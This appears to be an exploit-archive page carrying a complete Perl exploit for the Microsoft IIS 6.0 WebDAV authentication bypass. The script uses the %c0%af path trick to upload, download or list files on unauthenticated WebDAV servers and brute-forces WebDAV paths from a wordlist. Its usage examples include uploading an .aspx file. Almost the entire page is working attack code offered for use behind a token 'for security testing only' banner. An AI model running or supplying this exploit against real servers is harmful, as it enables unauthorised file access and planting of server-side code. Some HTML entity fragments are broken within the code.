Microsoft IIS 6.0 WebDAV Auth. Bypass

2010.09.25
Credit: FoX HaCkEr
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

====================================== MS IIS 6.0 WebDAV Auth. Bypass Exploit ====================================== # Author : FoX HaCkEr #Contact : MKQ@HoTmAiL.CoM # SiTe : www.sec4ever.com ====================================================================================================== #!/usr/bin/perl # ********* !!! WARNING !!! ********* # * FOR SECURITY TESTiNG ONLY! * # *********************************** # MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 # v1.1 add brute force dir fuction. # v1.0 download?upload and list dir. # # Usage: # IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file] # -target &nbs p; eg.: 192.168.1.1 # -port eg.: 80 # -method eg.: g # (p:PUT,g:GET,l:LIST) # -webdavpath eg.: webdav # -BruteForcePath eg.: brute force webdav path # -file (optional) eg.: test.aspx # Example: # put a file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx # get a file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx # list dir: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav # brute force + list dir: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt # brute force + get file: # IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx use IO::Socket;use Getopt::Long; use threads; use threads::shared; # Globals Go Here. my $target; # Host being probed. my $port; # Webserver port. my $method; # HTTP Method, PUT GET or . my $xpath; # WebDAV path on Webserver. my $bpath; # Bruteforce WebDAV path. my $file; # file name. my $httpmethod; my $Host_Header; # The Host header has to be changed GetOptions( "target=s" ; => \$target, "port=i" => \$port, "method=s" => \$method, "xpath=s" => \$xpath, "bpath=s" => \$bpath, "file=s" => \$file, "help|?" => sub { hello(); exit(0); } ); $error .= "Error: You must specify a target host\n" if ((!$target)); $error .= "Error: You must specify a target port\n" if ((!$port)); $error .= "Error: You must specify a put,get or list method\n" if ((!$method)); $error .= "Error: You must specify a webdav path\n" if ((!$xpath) && (!$bpath)); $error .= "Error: You must specify a upload or download file name\n" if ((!$file) && $method != "l"); if ($error) { print "Try $0 -help or -?' for more information.\n$error\n" ; exit; } hello(); if ($method eq "p") { $httpmethod = "PUT"; } elsif ($method eq "g") { $httpmethod = "GET"; } elsif ($method eq "l") { $httpmethod = "PROPFIND"; } else { print "$method Method not accept !!!\n"; exit(0); } # ************************************ # * We testing WebDAV methods first * # ************************************ webdavtest($target,$port); #end of WebDAV testing. # **************************************** # * We try to brute forceing WebDAV path * # **************************************** if ($bpath) { $xpath = webdavbf($target,$port,$bpath); } #end of brute force print "-" x 60 ."\n"; if ($httpmethod eq "PUT") { my $content; my $data; #cacl file size $filesize = -s $file; print "$file size is $filesize bytes\n"; open(INFO, $file) || die("Could not open file!"); #@lines=<INFO>; binmode(INFO); #binary while( read(INFO, $data, $filesize)) { $content .= $data; } close(INFO); #print $content; $Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n"; } elsif ($httpmethod eq "GET") { $Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n"; } elsif ($httpmethod eq "PROPFIND") { $Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n"; $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; } print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x 60 ."\n"; # ******************** **** # * Sending HTTP request * # ************************ if ($httpmethod eq "PUT") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $port\n";} } elsif ($httpmethod eq "GET") { @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $port\n";} } elsif ($httpmethod eq "PROPFIND") { @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n$Host_Header",$target,$port,10); if ($#results < 1){die "10s timeout to $target on port $port\n";} } #print @results; $flag="off"; if ($results[0] =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){ $flag="on"; } elsif ($results[0] =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){ $flag="off"; }&nb sp; print "-" x 60 ."\n"; if ($flag eq "on") { if ($httpmethod eq "PUT") { print "$httpmethod $file from [$target:$port/$xpath] OK\r\n"; } elsif ($httpmethod eq "GET") { my $line_no = 0; my $counter = @results; foreach $line (@results){ ++$line_no; if ($line =~ /^Accept-Ranges: bytes\r\n/){ last; } } # Write file to disk open(OUTFILE, ">$file") or die "Could not write to file: $!\n"; binmode (OUTFILE); print OUTFILE @results[$line_no+1..$counter]; close(OUTFILE); print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n"; } elsif ($httpmethod eq "PROPFIND") { print "$httpmethod path list from [$target:$port/$xpath] OK\r\n"; foreach $line (@results){ if ($line =~ /^\<\?xml version\=/i){ my @list = split("<a:href>", $line); foreach $path (@list) { $no = index($path,"<"); $result.=substr($path, 0, $no)."\n"; } print $result; ; last; } } } } else { print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n"; } print "-" x 60 ."\n"; exit(0); # ************* # * Sendraw-2 * # ************* sub sendraw2 { my ($pstr,$realip,$realport,$timeout)=@_; my $target2 = inet_aton($realip); my $flagexit=0; $SIG{ALRM}=\&ermm; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems"); alarm($timeout); if (connect(S,pack "SnA4x8",2,$realport,$target2)){ alarm(0); my @in; select(S); $|=1; print $pstr; alarm($timeout); while(<S>){ if ($flagexit == 1){ close (S); print STDOUT "Timeout\n"; return "Timeout"; } push @in, $_; } alarm(0); select(STDOUT); close(S); return @in; } else {return "0";} } sub ermm{ $flagexit=1; close (S); } sub webdavtest { my ($testip,$testport)=@_; print "-" x 60 ."\n"; print "Testing WebDAV methods [$testip $testport]\n"; print "-" x 60 ."\n"; @results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$testip,$testport,10); if ($#results < 1){die "10s timeout to $target on port $testport\n";} #print @results; $flag="off"; foreach $line (@results){ if ($line =~ /^Server: /){ ($left,$right)=split(/\:/,$line); $right =~ s/ //g; print "$target : Server type is : $right"; if ($right !~ /Microsoft-IIS/i){ print "$target : Not a Microsoft IIS Server\n"; exit(0); } } if ($line =~ /^DAV: /){ $flag="on"; } if ($line =~ /^Public: / && $flag eq "on"){ ($left,$right)=split(/\:/,$line); &n bsp; $right =~ s/ //g; print "$target : Method type is : $right"; if ($right !~ /$httpmethod/i){ print "$target : Not allow $httpmethod on this WebDAV Server\n"; exit(0); } else { $flag="on"; } } } if ($flag eq "off") { print "$target : WebDAV disable\n"; exit(0); } } sub webdavbf { my ($bfip,$bfport,$bfpath)=@_; print "-" x 60 ."\n"; print "Try to brute forceing WebDAV path ...\n"; print "-" x 60 ."\n"; & nbsp; open(BF, $bfpath) || die("Could not open file!"); foreach $lines (<BF>){ chomp($lines); $Host_Header = "Host: $bfip\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n"; $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>"; @results=sendraw2("PROPFIND /$lines/ HTTP/1.0\r\n$Host_Header",$bfip,$bfport,10); if ($#results < 1){die "10s timeout to $bfip on port $bfport\n";} print "[$lines]...$results[0]"; #maybe this response< br> #HTTP/1.1 207 Multi-Status if ($results[0] =~ m|^HTTP/1\.[01] 401 |){ print "Find out path on [$lines]\n"; return $lines; last; } } close(BF) ; print "Sorry... We can not find any more path... :(\n"; exit(0); } sub hello{ print "\n"; print "\t ##################################################\n"; print "\t # MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0 #\n"; print "\t # **************** !!! WARNING !!! **************#\n"; print "\t # **** FOR PRIV8 AND EDUCATIONAL USE ONLY! ****#\n"; print "\t # ***********************************************#\n"; print "\t # Written by csgcsg 090529 ; #\n"; print "\t ###################################################\n"; print "\n\t $0 -target -port -method -webdavpath [-file]\n"; print "\n\t -target\t\t eg.: 192.168.1.1\n"; print "\t -port\t\t\t eg.: 80\n"; print "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n"; print "\t -webdavpath|-bruteForcePath\t\t eg.: webdav\n"; print "\t -file\t\t\t eg.: test.aspx\n\n"; print "\tUsage eg.: \n\t$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx\n"; }; ======================================================================================================= Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members p0c team &


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top